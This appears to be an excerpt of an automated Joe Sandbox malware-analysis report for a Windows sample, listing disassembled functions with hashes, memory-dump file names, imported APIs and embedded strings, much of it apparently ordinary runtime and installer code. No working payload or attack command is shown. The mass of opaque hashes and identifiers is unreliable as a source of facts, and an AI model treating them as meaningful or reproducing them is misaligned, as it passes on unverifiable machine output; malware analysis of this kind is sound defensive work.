                                                                                    • Instruction ID: 20a540437992dfb58ce2cc8a762b6642539a66350b0ee1235fd333c3b164d180
                                                                                    • Opcode Fuzzy Hash: 592f45aa0811682718af093716bfb30daa8fac2d2ccf8e604bc858814a1fd6bf
                                                                                    • Instruction Fuzzy Hash: D3910362B185819AEB11EF29D4916F9E320FF66788F801031EF4E07749EF39E60AC314
                                                                                    Function 00007FF7B8F0AE80 Relevance: .2, Instructions: 180COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 38696a5db9789e83fac81800053dd160c5011321cb6015662279ee97045c30bf
                                                                                    • Instruction ID: ddb9d91384bc5a2c7512041ea0db4073dabd3eb1ba33029bc77be73eac1c8cf7
                                                                                    • Opcode Fuzzy Hash: 38696a5db9789e83fac81800053dd160c5011321cb6015662279ee97045c30bf
                                                                                    • Instruction Fuzzy Hash: 85612673B191D44DE711DF7881108FDFFA1A76A786BC54032DFAA6364ADA28E206C724
                                                                                    Function 00007FF7B8F119CC Relevance: .1, Instructions: 141COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 097eca34b4f20da32121984422be4d62c3ff3cc334e1e225f2117def3e4ca1ae
                                                                                    • Instruction ID: 7e95ee46743f8f68a01ce4f6d76a625821501d82d4756e0c3170f453f357b272
                                                                                    • Opcode Fuzzy Hash: 097eca34b4f20da32121984422be4d62c3ff3cc334e1e225f2117def3e4ca1ae
                                                                                    • Instruction Fuzzy Hash: FC515172B181518BE324AF28D0087BDF761FBA5B85F884130DB4947688EE3DE582CB14
                                                                                    Function 00007FF7B8F122C4 Relevance: .1, Instructions: 112COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6a2057bf2cf5352d1239ed8fbaff7b3a9044c575ec2ba21c12f1fd8296611fb0
                                                                                    • Instruction ID: 5610094ed2b7dcf459cf051dc0b54204dcca6ff6b837032b0a1dc7fab25cd622
                                                                                    • Opcode Fuzzy Hash: 6a2057bf2cf5352d1239ed8fbaff7b3a9044c575ec2ba21c12f1fd8296611fb0
                                                                                    • Instruction Fuzzy Hash: 1431F6B2A185429FD718EE5ADA902BEFBD1F756345F808038DB4683746DA3CE042C714
                                                                                    Function 00007FF7B8F0D484 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                                                    • Instruction ID: fbe83bd0f020451dd1451ed6e1f31f58071bb89a0151d739bee3c87f8a1f04d8
                                                                                    • Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                                                                    • Instruction Fuzzy Hash: 68F01779A1C0065EFAE8782C8409339D043DB73316FA48636E62BCE2C9D81DB9A3512D
                                                                                    Function 00007FF7B8F22D70 Relevance: .0, Instructions: 2COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4e31597af9836e948183d66b0f4350d9ff44a3830c053134915e18d4a90d8bb2
                                                                                    • Instruction ID: d9aa78c2dcf5cec14a60183fc83a6c5ce64e3e3dd181881749c83d7954405b0e
                                                                                    • Opcode Fuzzy Hash: 4e31597af9836e948183d66b0f4350d9ff44a3830c053134915e18d4a90d8bb2
                                                                                    • Instruction Fuzzy Hash: 0EA00131918803DCE644AB08EC60060E220BB76302FC00231E20D412A89E7CA402C229
                                                                                    Function 00007FF7B8F05D18 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 447COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                    • String ID: DXGIDebug.dll$UNC$\$\$\\?\
                                                                                    • API String ID: 4097890229-2826201243
                                                                                    • Opcode ID: 9a3fe7e6dc17e2e86d9170e212356c68d9816190dd817b96cf339f9ee758d129
                                                                                    • Instruction ID: ce3c995a5e49638eda4593926f79c0f93e01dfa1dec8c8c54bea3f4b6af63a72
                                                                                    • Opcode Fuzzy Hash: 9a3fe7e6dc17e2e86d9170e212356c68d9816190dd817b96cf339f9ee758d129
                                                                                    • Instruction Fuzzy Hash: 3612C632A0974688EB10AF69D0401ADE361EB66B95FD04231EB6C17BDDDF7CE582C358
                                                                                    Function 00007FF7B8F1671C Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 204memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                                                    • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                    • API String ID: 2868844859-1533471033
                                                                                    • Opcode ID: 1b2d5775157f9ea39f1859b8594939bee62501cad1db815e2df6929a2e6d4427
                                                                                    • Instruction ID: a6de4a217abe3f9889c27673c06c3cd5de0e9a97ae23edb4688f6777e2a5112b
                                                                                    • Opcode Fuzzy Hash: 1b2d5775157f9ea39f1859b8594939bee62501cad1db815e2df6929a2e6d4427
                                                                                    • Instruction Fuzzy Hash: 09819E72F18A4289FA00FBA9D4401EDE361AF66795F804231DF1D2669EEE3CD547C358
                                                                                    Function 00007FF7B8F2D570 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                    • API String ID: 3215553584-2617248754
                                                                                    • Opcode ID: fb2b6fa5596b496e5082ea7bb115a6454e3b4e13ab35c36ef2f80d9f7c651b45
                                                                                    • Instruction ID: 769e02dc6b20ca19c6aec4ab95de97fccc14cd2457833642c8e8b518a093d31e
                                                                                    • Opcode Fuzzy Hash: fb2b6fa5596b496e5082ea7bb115a6454e3b4e13ab35c36ef2f80d9f7c651b45
                                                                                    • Instruction Fuzzy Hash: CC419F32A05B458DE700DF69E8517A9B7A4EB25388F805136EF5C07B98EE3CD126C358
                                                                                    Function 00007FF7B8F1EBD8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                    • String ID: STATIC
                                                                                    • API String ID: 2845197485-1882779555
                                                                                    • Opcode ID: fe85cdfe7197866d02ebc14119a63c5c5099d9eb036adc6d12fdd3ad6bbae135
                                                                                    • Instruction ID: 6018721184e58865ba850a1283b3f85043254b8f9f2abb3a7cee990bc1342544
                                                                                    • Opcode Fuzzy Hash: fe85cdfe7197866d02ebc14119a63c5c5099d9eb036adc6d12fdd3ad6bbae135
                                                                                    • Instruction Fuzzy Hash: 87319431B086428AFA54BB19A9147F9E392BB9ABC2F800430DF4D4775DDE3CE5478B64
                                                                                    Function 00007FF7B8F1A690 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemTextWindow
                                                                                    • String ID: LICENSEDLG
                                                                                    • API String ID: 2478532303-2177901306
                                                                                    • Opcode ID: 41696ad9de8f4e89a394de1e36f8b759beada25f57ed009437ff3c9fa10f2114
                                                                                    • Instruction ID: 89f5610731bd377db649f6eec96abdaf1c980179d1af6cf66959aeb1ac9f1e64
                                                                                    • Opcode Fuzzy Hash: 41696ad9de8f4e89a394de1e36f8b759beada25f57ed009437ff3c9fa10f2114
                                                                                    • Instruction Fuzzy Hash: 8B418331A087428AFB54BB19E4447B8E361BF66B82F940135DF0D07B99CF3DA6478328
                                                                                    Function 00007FF7B8F0B2FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                    • API String ID: 2915667086-2207617598
                                                                                    • Opcode ID: 1a2a0462fba0bbc2057d87a603739d697dd4cc3eff5894cc4bad96471bd1a8f1
                                                                                    • Instruction ID: fea7ce9ffdbb1b1f4ac0a244e2de548efcd3767622ed87337f4be703a45b0aef
                                                                                    • Opcode Fuzzy Hash: 1a2a0462fba0bbc2057d87a603739d697dd4cc3eff5894cc4bad96471bd1a8f1
                                                                                    • Instruction Fuzzy Hash: 62315834A18B439DFA10BF1AA840575E361AF67B92FD40131CA6D077ACDE3CE1578328
                                                                                    Function 00007FF7B8EF2D94 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103filepipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$NamedPipe$CreateErrorLastPeekReadWaitWrite
                                                                                    • String ID: \\.\pipe\
                                                                                    • API String ID: 687869086-91387939
                                                                                    • Opcode ID: 775a8035613ed1d19014cf5cf142c3491cf5c4671f54193dbf5003945902ee6f
                                                                                    • Instruction ID: 8c36ca2c81592090c9b27ffa39497ae2bcc7bc1b5d5814787444c8735b65316e
                                                                                    • Opcode Fuzzy Hash: 775a8035613ed1d19014cf5cf142c3491cf5c4671f54193dbf5003945902ee6f
                                                                                    • Instruction Fuzzy Hash: 73418372618A42C6F720EB25E4503AAE3A0FB95758FD04135EB4D4799CCF7CD546CB14
                                                                                    Function 00007FF7B8F2465C Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 320COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 2940173790-393685449
                                                                                    • Opcode ID: 42093b04772e557fd7bd192b609e06aa5878fa6e40c44ccf295585569dcfa627
                                                                                    • Instruction ID: 6122b7cf1eabe58ea17579eec1993dfd363a90c563a38e42d1b444c668530413
                                                                                    • Opcode Fuzzy Hash: 42093b04772e557fd7bd192b609e06aa5878fa6e40c44ccf295585569dcfa627
                                                                                    • Instruction Fuzzy Hash: 5FE1A372E087828EE710AF68D4403ADF7A0FB66759F510235EB9C5765ACF78E082C714
                                                                                    Function 00007FF7B8F042AC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocClearStringVariant
                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                    • API String ID: 1959693985-3505469590
                                                                                    • Opcode ID: 5ec0bdf6e4fd55f7a855f6cb4b4b547710adc0b70fdccd3bae3911fccdb829d4
                                                                                    • Instruction ID: 081c597371c22695947e221763785cb0aaf58b31bd376a5e89ddcfbba18a4df8
                                                                                    • Opcode Fuzzy Hash: 5ec0bdf6e4fd55f7a855f6cb4b4b547710adc0b70fdccd3bae3911fccdb829d4
                                                                                    • Instruction Fuzzy Hash: D5713A36A14A058AEB10AF69E8805ADF7B0FBA9B99F805132DF5D43B68CF3CD045C714
                                                                                    Function 00007FF7B8F261FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7B8F26403,?,?,?,00007FF7B8F240CE,?,?,?,00007FF7B8F24089), ref: 00007FF7B8F26281
                                                                                    • GetLastError.KERNEL32(?,?,00000000,00007FF7B8F26403,?,?,?,00007FF7B8F240CE,?,?,?,00007FF7B8F24089), ref: 00007FF7B8F2628F
                                                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7B8F26403,?,?,?,00007FF7B8F240CE,?,?,?,00007FF7B8F24089), ref: 00007FF7B8F262B9
                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,00007FF7B8F26403,?,?,?,00007FF7B8F240CE,?,?,?,00007FF7B8F24089), ref: 00007FF7B8F26327
                                                                                    • GetProcAddress.KERNEL32(?,?,00000000,00007FF7B8F26403,?,?,?,00007FF7B8F240CE,?,?,?,00007FF7B8F24089), ref: 00007FF7B8F26333
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 2559590344-2084034818
                                                                                    • Opcode ID: f98d511d16b7c984806b59baf49c4c0eb2992fa5f93f3c16c0f276863a04ae74
                                                                                    • Instruction ID: df948d777a858e048c81fe4d7b3ffce8832d23fc68f7bd8e66a4286cf0dde502
                                                                                    • Opcode Fuzzy Hash: f98d511d16b7c984806b59baf49c4c0eb2992fa5f93f3c16c0f276863a04ae74
                                                                                    • Instruction Fuzzy Hash: 2631A131A1A64189EE11AF8AD800575E394FF66BA1F994535EF1D077C8DF3CE8468338
                                                                                    Function 00007FF7B8F20FAC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(?,?,?,00007FF7B8F20F18,?,?,?,00007FF7B8F2135D), ref: 00007FF7B8F20FD3
                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7B8F20F18,?,?,?,00007FF7B8F2135D), ref: 00007FF7B8F20FF0
                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7B8F20F18,?,?,?,00007FF7B8F2135D), ref: 00007FF7B8F2100C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule
                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                    • API String ID: 667068680-1718035505
